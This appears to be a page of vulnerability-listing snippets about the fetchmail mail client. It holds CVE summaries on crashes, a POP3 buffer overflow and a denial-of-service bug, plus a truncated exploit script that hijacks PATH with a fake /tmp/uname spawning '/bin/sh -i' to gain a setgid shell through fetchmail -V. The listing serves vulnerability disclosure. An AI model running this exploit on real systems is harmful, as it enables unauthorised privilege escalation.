AZL-68127 CVE-2025-61962 affecting package fetchmail 6.4.39-2

In fetchmail before 6.5.6, the SMTP client can crash when authenticating upon receiving a 334 status code in a malformed context...

gotpwnedagainmail.sh.txt

!/bin/sh http://www.digitalmunition.com written by kf kflistsatdigitalmunitiondotcom Previously undisclosed local fetchmail issue. This takes setgid=6 http://docs.info.apple.com/article.html?artnum=106704 export PATH=/tmp:$PATH echo /bin/sh -i /tmp/uname chmod +x /tmp/uname /usr/bin/fetchmail -V...

security flaw

Buffer overflow in the POP3 client in Fetchmail before 6.2.5.2 allows remote POP3 servers to cause a denial of service and possibly execute arbitrary code via long UIDL responses. NOTE: a typo in an advisory accidentally used the wrong CVE identifier for the Fetchmail issue. This is the correct...

fetchmail -- denial-of-service vulnerability

Dave Jones discovered a denial-of-service vulnerability in fetchmail. An email message containing a very long line could cause fetchmail to segfault due to missing NUL termination in transact.c. Eric Raymond decided not to mention this issue in the release notes for fetchmail 6.2.5, but it was...